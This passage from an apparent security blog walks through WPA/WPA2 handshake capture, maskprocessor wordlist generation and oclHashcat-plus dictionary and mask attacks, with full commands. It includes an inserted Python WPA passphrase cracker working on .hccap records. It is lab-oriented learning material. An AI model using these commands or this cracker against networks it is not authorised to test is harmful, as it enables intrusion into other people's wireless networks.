<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp09.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp09.jpg" width="640" /></a></div><br />
So wordlist output can be masked in numerous ways to best suit what you are trying to achieve.<br />
<br />
<br />
<br />
<b>CREATING WORDLISTS IN INCREMENTS</b><br />
<b>=====================================</b><br />
<br />
All of the above can also be done directly in oclHashcat+ by specifying masks for the<br />
hash cracking run, but maskprocessor comes into its own when you need to create wordlists<br />
in increments.<br />
<br />
Using the <span style="color: red;"><b>-i</b></span> switch we tell maskprocessor to create the wordlist in increments: by default from 1 character up to the full length of the mask, or between user-defined minimum and maximum lengths (<b>--increment-min</b> / <b>--increment-max</b>).<br />
<br />
<br />
To create a wordlist from 1 character to 10 characters.<br />
Starting from 0 and ending at 9999999999<br />
<br />
<span style="color: lime;">./mp32.bin -i ?d?d?d?d?d?d?d?d?d?d </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp10.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp10.jpg" width="640" /></a></div><br />
If we want to create a wordlist for WPA/WPA2 then of course there is no point in creating wordlists shorter than 8 characters (minimum passphrase length for WPA/WPA2), so in such a case we would specify to have the increments start at the 8th character.<br />
<br />
To create a wordlist with at least 8 numeric values and increment by 1 until it reaches 10 characters;<br />
Starting at 00000000 (8 characters) and stopping at 9999999999 (10 characters)<br />
<br />
<span style="color: lime;">./mp32.bin -i --increment-min=8 ?d?d?d?d?d?d?d?d?d?d </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp11.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp11.jpg" width="640" /></a></div><br />
As maskprocessor works from a mask, the maximum word length is already set by the number of mask placeholders, so --increment-max is rarely needed.<br />
You could however have 10 mask placeholders and tell it to stop at the 9th position ;<br />
<br />
<span style="color: lime;">./mp32.bin -i --increment-min=8 --increment-max=9 ?d?d?d?d?d?d?d?d?d?d </span><br />
<br />
Will start at 00000000 (8 characters) and stop at 999999999 (9 characters).<br />
<br />
<br />
<br />
<b>EMULATING INCREMENTAL BRUTEFORCE ATTACK</b><br />
<b>=============================================</b><br />
<br />
So to put all this to practice together with cracking a hash with oclHashcat+, we could pipe output<br />
from maskprocessor through to oclHashcat+<br />
<i>Note that although maskprocessor can create words of over 15 characters, oclHashcat+ will not </i><i>process any passphrases with more than 15 characters.</i><br />
<i><span style="color: red;">So your hash cracking fun with oclHashcat+ is limited to max 15 characters.</span></i><br />
<br />
Again I will switch to my Windows system for this.. ;)<br />
I extracted the maskprocessor executable to the same directory as oclHashcat for sake of ease;<br />
c:\oclHashcat\<br />
As I am running a 64bit OS, I am using the mp64.exe<br />
<br />
<br />
To start at aaaaaaaa (8 characters) and finish at zzzzzzzzzz (10 characters as there are only 10 mask placeholders) piping through to oclHashcat ;<br />
<br />
<span style="color: lime;">mp64.exe -i --increment-min=8 ?l?l?l?l?l?l?l?l?l?l | cudaHashcat-plus64.exe -m 2500 fubar.hccap</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="598" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_02.jpg" width="640" /></a></div><br />
Using mixed case starting at aaaaaaaa (8 characters) and stopping at ZZZZZZZZZZ (10 characters)<br />
(Using the <b><span style="color: red;">^</span></b> symbol to break the line for clarity's sake, in linux you would use the backslash <span style="color: red;"><b>\</b></span><br />
to break the line)<br />
<br />
<span style="color: lime;">mp64.exe -1 ?l?u -i --increment-min=8 --increment-max=10 ?1?1?1?1?1?1?1?1?1?1 | ^</span><br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -n 40 fubar.hccap</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="598" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_03.jpg" width="640" /></a></div><br />
If you were to expect that the first 4 characters were for instance '1234' then you can fix these characters<br />
in the mask as follows ;<br />
<br />
<span style="color: lime;">mp64.exe -i --increment-min=8 1234?d?d?d?d?d?d | ^</span><br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -n 80 fubar.hccap</span><br />
so Maskprocessor would go through 12340000 -- 1234999999<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="598" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_01.jpg" width="640" /></a></div><br />
This however does not work the other way around. If for instance you know that the last 4 characters<br />
are 6789 and use the syntax ;<br />
<span style="color: lime;">mp64.exe -i --increment-min=8 ?d?d?d?d?d?d6789 | oclHashcat-plus64.exe -m 2500 fubar.hccap</span><br />
it will not do what you want: the 8 character pass simply takes the first 8 mask positions from left to right<br />
(six digits followed by 67), cutting off the last 2 characters which we wanted fixed.<br />
<br />
<div>So in such a case as above we would have to use a so-called rule to have the numeric values 6789 appended to each created passphrase.</div><div><br />
To create such a rule we would need to create a file called append.rule for instance with the following entry;<br />
$6$7$8$9<br />
This rule would specify that each line fed into oclHashcat will have the numbers 6789 appended to it.<br />
<br />
<span style="color: yellow;">echo $6$7$8$9 > append.rule</span><br />
<i>(fine in the Windows command prompt; in a Linux shell quote it, <span style="color: yellow;">echo '$6$7$8$9' > append.rule</span>, otherwise the shell expands $6, $7 etc. as positional parameters and you end up with an empty rule)</i><br />
In this case you could also specify --increment-min=4 so that every word reaching hashcat is at least<br />
8 characters (4 generated plus the 4 appended), or just leave out --increment-min<br />
and let hashcat reject the words with less than 8 characters itself.<br />
<br />
</div><div><span style="color: lime;">mp64.exe -i ?d?d?d?d?d?d?d?d?d?d?d?d | cudaHashcat-plus64.exe -r append.rule -m 2500 fubar.hccap </span></div><div><i>Keep the 15 character limit mentioned above in mind: with 4 characters appended, the 12 character pass produces 16 character words, beyond what oclHashcat+ will process, so 11 placeholders is the most that is useful here.</i><br />
</div><div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="598" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_04.jpg" width="640" /></a></div><br />
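<br />
As an added example, not part of the original post and not code from the maskprocessor or hashcat projects: the Python script below re-implements the pieces of mask processing discussed in the increment section and in the append-rule section above (built-in and custom charsets, fixed characters, -i with --increment-min/--increment-max, the $X append rule and hashcat's 8..63 character WPA filter), so you can check keyspace sizes, see why a mask with a fixed suffix gets truncated in increment mode, and see how the append rule fixes it. It generates words in odometer order (rightmost position changes fastest); that ordering is an assumption, mp64 may print them in a different order, but the set and the count are the same.<br />
<br />
```python
import itertools
import math
import string

# Built-in charsets as maskprocessor and hashcat define them.
BUILTIN = {"l": string.ascii_lowercase, "u": string.ascii_uppercase, "d": string.digits,
           "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"}


def expand_charset(definition, custom):
    """Expand a definition such as '?l?d' or '?dABCDEF' into its characters; ?1..?4 are custom sets."""
    chars, i = [], 0
    while i < len(definition):
        if definition[i] == "?" and i + 1 < len(definition):
            key = definition[i + 1]
            if key == "?":
                chars.append("?")             # '??' is a literal question mark
            elif key in BUILTIN:
                chars.extend(BUILTIN[key])
            elif key in custom:
                chars.extend(custom[key])
            else:
                raise ValueError("unknown charset ?%s" % key)
            i += 2
        else:
            chars.append(definition[i])       # plain character
            i += 1
    return "".join(dict.fromkeys(chars))      # de-duplicate, keep first-seen order


def parse_mask(mask, custom_defs=None):
    """One charset string per mask position. custom_defs maps '1'..'4' to definitions,
    e.g. {'1': '?l?u', '2': '?dABCDEF'} for '-1 ?l?u -2 ?dABCDEF'."""
    custom = {}
    for key, definition in (custom_defs or {}).items():
        custom[key] = expand_charset(definition, custom)
    positions, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            positions.append(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:
            positions.append(mask[i])         # fixed character, e.g. the '1' in 1234?d?d
            i += 1
    return positions


def _lengths(positions, increment, inc_min, inc_max):
    """Word lengths a run produces: the full mask, or in -i mode inc_min..inc_max."""
    n = len(positions)
    if not increment:
        return [n]
    return list(range(inc_min or 1, min(inc_max or n, n) + 1))


def keyspace(mask, custom_defs=None, increment=False, inc_min=None, inc_max=None):
    """Number of words the mask produces (summed over all lengths in -i mode)."""
    positions = parse_mask(mask, custom_defs)
    return sum(math.prod(len(p) for p in positions[:n])
               for n in _lengths(positions, increment, inc_min, inc_max))


def candidates(mask, custom_defs=None, increment=False, inc_min=None, inc_max=None):
    """Generate the words. In -i mode an n character pass keeps the first n mask
    positions, which is exactly why a fixed suffix such as 6789 gets cut off."""
    positions = parse_mask(mask, custom_defs)
    for n in _lengths(positions, increment, inc_min, inc_max):
        for combo in itertools.product(*positions[:n]):
            yield "".join(combo)


def first_last(mask, custom_defs=None):
    """First and last word of a fixed-length mask: a quick sanity check of a mask."""
    positions = parse_mask(mask, custom_defs)
    return "".join(p[0] for p in positions), "".join(p[-1] for p in positions)


def apply_rule(rule, word):
    """Tiny hashcat rule interpreter: '$X' appends X, '^X' prepends X, ':' does nothing."""
    i = 0
    while i < len(rule):
        op = rule[i]
        if op == "$":
            word, i = word + rule[i + 1], i + 2
        elif op == "^":
            word, i = rule[i + 1] + word, i + 2
        elif op in ": ":
            i += 1
        else:
            raise ValueError("unsupported rule function %r" % op)
    return word


def wpa_candidates(mask, rule=None, **kwargs):
    """mask -> optional rule -> WPA/WPA2 length filter (8..63 characters): the words
    that actually reach the expensive PBKDF2 stage of an -m 2500 run."""
    for word in candidates(mask, **kwargs):
        if rule:
            word = apply_rule(rule, word)
        if 8 <= len(word) <= 63:
            yield word
```
<br />
<i>keyspace("?d" * 10, increment=True, inc_min=8, inc_max=9)</i> gives the 10^8 + 10^9 words of the --increment-min=8 --increment-max=9 run, <i>first_last("?1?1?1?1?d?d?d?d", {"1": "?l?u"})</i> returns ('aaaa0000', 'ZZZZ9999') as in the screenshot above, and <i>wpa_candidates("?d?d?d?d", rule="$6$7$8$9", increment=True)</i> yields exactly the 10,000 eight character words ending in 6789 that the append rule produces, with the shorter passes rejected by the length filter just as hashcat rejects them.<br />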
</div><div><b>RULES</b></div><div><a href="http://hashcat.net/wiki/rule_based_attack">http://hashcat.net/wiki/rule_based_attack</a></div><div><a href="http://kaoticcreations.blogspot.com/2011/09/explanation-of-hashcat-rules.html" target="_blank">http://kaoticcreations.blogspot.com/2011/09/explanation-of-hashcat-rules.html</a> </div><div><br />
Will have to be my next area of focus..<br />
<br />
</div><div><br />
<b>BENEFITS OF MASKPROCESSOR OVER CRUNCH ;</b><br />
<b>==========================================</b><br />
Not much to be honest if you are on a linux system, but what it<br />
does allow is the specification of custom charsets for use in masks.<br />
<br />
I have to say though, the more I play with it, the more I like it ;<br />
Having an option which is nearly as versatile as crunch, yet able to<br />
run easily on Windows, makes this a great tool for me.<br />
In combination with Hashcat running on windows this really is a<br />
must have in your toolkit.<br />
<br />
I am sure there are other wordlist generators for Windows,<br />
but this to me definitely seems like the one to have and a truly<br />
impressive tool.<br />
<br />
Speedwise, Maskprocessor is (quite a bit) faster than Crunch; crunch is<br />
of course fast as it is, and possibly better documented (by me ;) ) at the time of writing,<br />
but that does not take away from the fact that Maskprocessor is an awesome bit of kit.<br />
<br />
<br />
There are other uses for Maskprocessor such as creating rules for use with<br />
oclHashcat which I still need to dig into.<br />
(promises.. promises.. ;) )<br />
<br />
<br />
<u><b>Linkage ;</b></u><br />
<a href="http://hashcat.net/wiki/maskprocessor">http://hashcat.net/wiki/maskprocessor</a><br />
<a href="http://hashcat.net/wiki/mask_attack">http://hashcat.net/wiki/mask_attack</a> <br />
<a href="http://www.irongeek.com/i.php?page=videos/hack3rcon2/martin-bos-your-password-policy-sucks">http://www.irongeek.com/i.php?page=videos/hack3rcon2/martin-bos-your-password-policy-sucks</a> <br />
<br />
<br />
<br />
</div>
<br />
<b>WPA Cracking with oclHashcat-plus</b> <i>(posted 2012-02-06, updated 2012-02-11)</i><br />
<br />
oclHashcat-plus is a GPU password cracker with a huge number of options, able to<br />
handle a myriad of hash types.<br />
<br />
I will go through steps I took to test the cracking of a WPA2 .cap file from my test setup.<br />
<br />
I will be using BackTrack5 R1 to capture the .cap file with 4-way handshake and to create the required<br />
.hccap file but will carry out the actual cracking of the .hccap file on a Win7 PC.<br />
This is because I am still worried that my knack of fubarring things up could prove life-threatening if I screw up a BT5R1 HDD install on my main machine ;) so I'll stick with using a VM image for the time being..<br />
lols..<br />
<br />
<br />
<b>PREPARATION</b><br />
===============<br />
First things first, I want to use aircrack-ng to create the .hccap file from a standard .cap file using the new<br />
-J option, as oclHashcat does not work with standard .cap files.<br />
The aircrack-ng version included in the stock install of BT5R1 does not yet have the -J option, so we need to get the latest and greatest from the aircrack-ng site and install it.<br />
<br />
Grab the latest build of aircrack here (last one in the list at time of writing 06-02-2012 was r2061);<br />
<a href="http://nightly.aircrack-ng.org/aircrack-ng/trunk/" target="_blank">http://nightly.aircrack-ng.org/aircrack-ng/trunk/</a><br />
extract and cd to directory;<br />
<span style="color: lime;">tar -xzf aircrack-ng-trunk-2012-02-05-r2061.tar.gz</span><br />
<span style="color: lime;">cd aircrack-ng-trunk-2012-02-05-r2061</span><br />
<br />
To be able to correctly build the latest aircrack-ng, an additional package is required before running make ;<br />
(reference; <a href="http://hashcat.net/forum/thread-816.html" target="_blank">http://hashcat.net/forum/thread-816.html</a>)<br />
<span style="color: lime;">apt-get install libssl-dev</span><br />
<i>(I had previously installed this hence the mention already the newest version)</i><br />
Then from within the aircrack directory install with ;<br />
<span style="color: lime;">make</span><br />
<span style="color: lime;">make install</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="369" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl01.jpg" width="640" /></a></div><br />
To update aircrack manually with previously downloaded files, there is a good detailed blogpost<br />
brought to my attention by a reader here <a href="http://www.kknd.com.br/security/01/" target="_blank">http://www.kknd.com.br/security/01/</a> on how to do that.<br />
<br />
Using either of the above methods, you should be ready to rock and roll with the latest aircrack-ng.<br />
<br />
<div style="color: red;"><u>Edit 10-02-2012</u></div>Backtrack repositories have been updated, the aircrack now included is<br />
v1.1 r2076, so;<br />
<div style="color: lime;">apt-get update </div><span style="color: lime;">apt-get upgrade</span><br />
will also get you a current version of aircrack which includes the -J switch.<br />
<br />
<br />
<b>CAPTURING THE WPA HANDSHAKE</b><br />
===============<br />
To start the process of capturing the handshake first place the wireless interface in monitor mode using airmon-ng;<br />
<br />
<span style="color: lime;">airmon-ng</span><br />
<span style="color: lime;">airmon-ng start wlan0</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="368" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl02.jpg" width="640" /></a></div><br />
and then fire up airodump with options to focus only on your target AP, in my case ;<br />
<br />
<span style="color: lime;">airodump-ng mon0 -c 11 -t wpa -d 98:FC:11:8E:0E:9C -w capture</span><br />
<br />
When the handshake is captured, either by patiently waiting for a client to connect, or by forcing a<br />
connected client to disconnect/reconnect with for instance aireplay-ng, this will be noted at the top right hand side of the airodump window.<br />
We can then stop airodump and verify that the handshake is captured with aircrack ;<br />
<br />
<span style="color: lime;">aircrack-ng capture-01.cap</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="368" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl03.jpg" width="640" /></a></div><br />
Now we have our .cap file with 4-way handshake, we need to convert it to .hccap format so that we<br />
can use oclHashcat on it.<br />
To do this we use the -J option in aircrack ;<br />
(<i>again, this option only available in the later aircrack builds, not in the stock install on BT5R1</i>)<br />
<br />
<span style="color: lime;">aircrack-ng capture-01.cap -J capture</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="492" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl04.jpg" width="640" /></a></div><br />
Now we have our .hccap file, I will be switching to my Win7 PC for the actual oclHashcat cracking.<br />
(yeah yeah..I know.. a bit of a fail... ;) )<br />
<br />
<br />
<b>OCLHASHCAT-PLUS</b><br />
===============<br />
First of course to <a href="http://hashcat.net/oclhashcat-plus/" target="_blank">download</a> the latest oclHashcat-plus <i>(at time of writing 06-02-2012 v0.07)</i> if you haven't already done so and extract it to where you want, I extracted all files to ;<br />
c:\oclHashcat\<br />
<br />
Open up the command prompt ;<br />
Start --> Run --> cmd<br />
And move to the directory where you extracted the oclHashcat files to, in my case ;<br />
<br />
<span style="color: lime;">cd c:\oclHashcat</span><br />
<br />
I am running a 64bit Windows 7 system with an nVidia card (CUDA) so I need to run the cudaHashcat-plus64.exe file, with --help for further info ;<br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe --help</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl05.jpg" /></a></div><br />
All the info may seem somewhat overwhelming, it certainly did to me, so herewith just a couple of<br />
examples on how it can be used.<br />
<br />
<i>I copied the capture.hccap previously created to the oclHashcat directory on the Windows system as</i><br />
<i>'capture_fubar.hccap'</i><br />
<br />
<br />
<b>DICTIONARY ATTACK</b><br />
===============<br />
I will be using the <a href="http://www.skullsecurity.org/wiki/index.php/Passwords" target="_blank">rockyou</a> dictionary as an example as it is a fairly large one, and copied the rockyou.txt file to the oclHashcat directory for easy access.<br />
<br />
To start the crack, we need to specify ;<br />
<span style="color: lime;">></span> The version of oclHashcat we need to use<br />
<i>in my case the 64bit version for CUDA enabled cards; for ATI cards you would use the ocl version.</i><br />
<span style="color: lime;">></span> -m [hash type #] (see the number references for hash types at the bottom of the help output)<br />
<i>in this case '2500' which is used for WPA/WPA2.</i><br />
<span style="color: lime;">></span> The path to the hash file / hccap file<br />
<i>in this case 'capture_fubar.hccap' in the same directory.</i><br />
<span style="color: lime;">></span> The path to the dictionary we are using for the attack<br />
<i>in this case 'rockyou.txt' in the same directory.</i><br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 capture_fubar.hccap rockyou.txt</span><br />
<i>Press 's' to get an updated status report (I hit enter first to create a space between status reports)</i><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl06.jpg" /></a></div><br />
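<br />
As an added example, not part of the original post and not hashcat's or aircrack-ng's own code: the Python script below shows what a <i>-m 2500</i> dictionary run does for every candidate, working directly on a .hccap record such as the one <i>aircrack-ng -J</i> wrote above. The 392 byte record layout (ESSID, AP MAC, station MAC, the two nonces, the EAPOL key frame with its MIC field zeroed, its length, the key version and the MIC) is taken from hashcat's documentation of the format and is an assumption here; because the PTK derivation orders the MACs and nonces with min/max, it does not matter which nonce the capture tool stored first. The sample record is constructed by the script itself, not a real capture: the AP MAC is the BSSID used in the airodump command above, while the station MAC, nonces, replay counter and passphrase are made up.<br />
<br />
```python
import hashlib
import hmac
import struct

# One .hccap record (392 bytes) in the layout hashcat documents for -m 2500 (assumed here):
# essid[36] mac_ap[6] mac_sta[6] nonce_sta[32] nonce_ap[32] eapol[256] eapol_size keyver keymic[16]
HCCAP_FMT = "<36s6s6s32s32s256sii16s"
HCCAP_SIZE = struct.calcsize(HCCAP_FMT)   # 392


def parse_hccap(record):
    (essid, mac_ap, mac_sta, snonce, anonce,
     eapol, eapol_size, keyver, keymic) = struct.unpack(HCCAP_FMT, record)
    return {"essid": essid.split(b"\x00", 1)[0], "mac_ap": mac_ap, "mac_sta": mac_sta,
            "snonce": snonce, "anonce": anonce, "eapol": eapol[:eapol_size],
            "keyver": keyver, "keymic": keymic}


def pmk_from_passphrase(passphrase, essid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    Those 4096 iterations per candidate are practically the whole cost of a WPA crack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, essid, 4096, 32)


def ptk_from_pmk(pmk, mac_ap, mac_sta, anonce, snonce):
    """PRF-512 of IEEE 802.11i. The min/max ordering means it does not matter which
    nonce or MAC the capture tool stored first."""
    data = (min(mac_ap, mac_sta) + max(mac_ap, mac_sta)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol, keyver):
    """MIC over the EAPOL key frame (MIC field zeroed): HMAC-MD5 for keyver 1 (WPA),
    HMAC-SHA1 truncated to 16 bytes for keyver 2 (WPA2)."""
    return hmac.new(kck, eapol, hashlib.md5 if keyver == 1 else hashlib.sha1).digest()[:16]


def check_passphrase(h, passphrase):
    pmk = pmk_from_passphrase(passphrase.encode(), h["essid"])
    kck = ptk_from_pmk(pmk, h["mac_ap"], h["mac_sta"], h["anonce"], h["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, h["eapol"], h["keyver"]), h["keymic"])


def crack_hccap(record, wordlist):
    """Dictionary attack: what 'cudaHashcat-plus64.exe -m 2500 capture.hccap rockyou.txt' does."""
    h = parse_hccap(record)
    for word in wordlist:
        word = word.rstrip("\r\n")
        if not 8 <= len(word) <= 63:   # WPA passphrase bounds; hashcat rejects these without any PBKDF2 work
            continue
        if check_passphrase(h, word):
            return word
    return None


def build_sample_hccap(passphrase, essid=b"fubar-test"):
    """Constructed test vector, not a real capture: a WPA2 handshake whose MIC we compute
    ourselves for `passphrase`. AP MAC = BSSID from the airodump example; the station
    MAC, nonces and replay counter are made up."""
    mac_ap, mac_sta = bytes.fromhex("98fc118e0e9c"), bytes.fromhex("001122334455")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    # EAPOL-Key message 2/4, 99 bytes: version, type, length, descriptor, key info 0x010a (pairwise,
    # MIC, keyver 2), key length 16, replay counter, SNonce, IV, RSC, ID, zeroed MIC, key data length
    eapol = (b"\x02\x03\x00\x5f\x02\x01\x0a\x00\x10" + (1).to_bytes(8, "big") + snonce
             + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase.encode(), essid), mac_ap, mac_sta, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol, 2)
    return struct.pack(HCCAP_FMT, essid, mac_ap, mac_sta, snonce, anonce, eapol, len(eapol), 2, mic)


if __name__ == "__main__":
    record = build_sample_hccap("password1")
    print(crack_hccap(record, ["short", "Password1", "qwerty123", "password1"]))   # password1
```
<br />
The PBKDF2 step is two chains of 4096 HMAC-SHA1 iterations per candidate and cannot be shortcut, which is why the rates in the screenshots are tens of thousands of passphrases per second on a 2012 GPU rather than the billions per second seen for unsalted fast hashes; everything after the PMK (the PRF and one HMAC over the key frame) is negligible by comparison. Note that words shorter than 8 characters are dropped before any of that work is done, which is the rejection behaviour relied on in the maskprocessor post above.<br />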
oclHashcat went through over 11.5 million passphrases in 2 min 15 sec, at around 54k passphrases a second..<br />
<br />
Increasing the workload on the GPU with the -n option (--gpu-accel) can increase performance and the number of passphrases checked per second ;<br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -n 80 capture_fubar.hccap rockyou.txt</span> <br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl07.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl07.jpg" /></a></div><br />
So with the increased load on the GPU it went from around 54k passphrases/sec to around 64k passphrases/sec.<br />
<br />
<br />
<br />
<b>MASK (BRUTEFORCE) ATTACK</b><br />
===============<br />
<br />
<br />
From what I have read, oclHashcat-plus is not yet able to run a mask bruteforce in increments (first testing 8 characters, then 9, then 10 etc.) so you need to do that manually.<br />
However I am not completely sure on the bruteforce options to be honest, as I see in the <a href="http://hashcat.net/wiki/brute_force_attack" target="_blank">WIKI</a> there are specific<br />
bruteforce options mentioned, but I can't seem to get them working as yet.<br />
Reading up ;)<br />
<br />
The masked bruteforce attack works by defining character sets to use (if custom character sets are required),<br />
and then uses the masks to define in which position in the passphrase the charsets should be used.<br />
<br />
There are various predefined charsets, among which ;<br />
<span style="color: yellow;">?l</span> -- lower case alpha<br />
<span style="color: yellow;">?u</span> -- upper case alpha<br />
<span style="color: yellow;">?d</span> -- numeric values<br />
<span style="color: yellow;">?s</span> -- special characters including space<br />
<br />
To start a mask / bruteforce attack, you need to specify ;<br />
<br />
<span style="color: lime;">></span> The version of oclHashcat you need to use<br />
<span style="color: lime;">></span> -m [hash type #] (-m 2500 for WPA/WPA2)<br />
<span style="color: lime;">></span> -a [attack mode #] (-a 3 for bruteforce / mask attack)<br />
<span style="color: lime;">></span> The custom character sets (if any).<br />
<span style="color: lime;">></span> The path to the hash file / hccap file.<br />
<span style="color: lime;">></span> The mask to use.<br />
<br />
<br />
The mask has to match the length of the password, so if testing for an 8 character password<br />
you have to enter 8 mask placeholders.<br />
<br />
If for instance testing all uppercase values for an 8 character password ;<br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -a 3 capture.hccap ?u?u?u?u?u?u?u?u</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl08.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="478" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl08.jpg" width="640" /></a></div><br />
If testing for numeric values only for an 8 character password ;<br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl09.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="478" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl09.jpg" width="640" /></a></div><br />
If we know that for an 8 character password the first 4 characters are numeric values and the last 4 characters are upper case values, then you would specify that as follows ;<br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -a 3 capture.hccap ?d?d?d?d?u?u?u?u</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl010.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="478" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl010.jpg" width="640" /></a></div><br />
<u>CUSTOM CHARSETS</u><br />
<br />
You can define upto 4 custom charsets to be used, this is done by using the switches ;<br />
-1, -2, -3, -4<br />
<br />
So thinking of our above dictionary crack, for the sake of argument, lets say we know the passphrase<br />
used is a 4 digit number only containing the numbers 1 2 3 4 followed by 6 upper case values only containing the letters Y T R E W Q.<br />
<br />
We could create a custom charset containing the numbers 1234 and specify these to be used for the<br />
first 4 digits of the passphrase.<br />
and also create a second custom charset containing YTREWQ and specify these to be used for the last 6 digits of the passphrase.<br />
In the mask you would then specify where to use the 1st custom charset and where to use the 2nd custom charset with <b>?1</b> for the 1st custom charset and <b>?2</b> for the 2nd custom charset as follows ;<br />
<i>Of course this is not a terribly realistic scenario .. but hey, you get the idea.. </i><br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -a 3 -1 1234 -2 YTREWQ capture_fubar.hccap ?1?1?1?1?2?2?2?2?2?2</span><br />
<br />
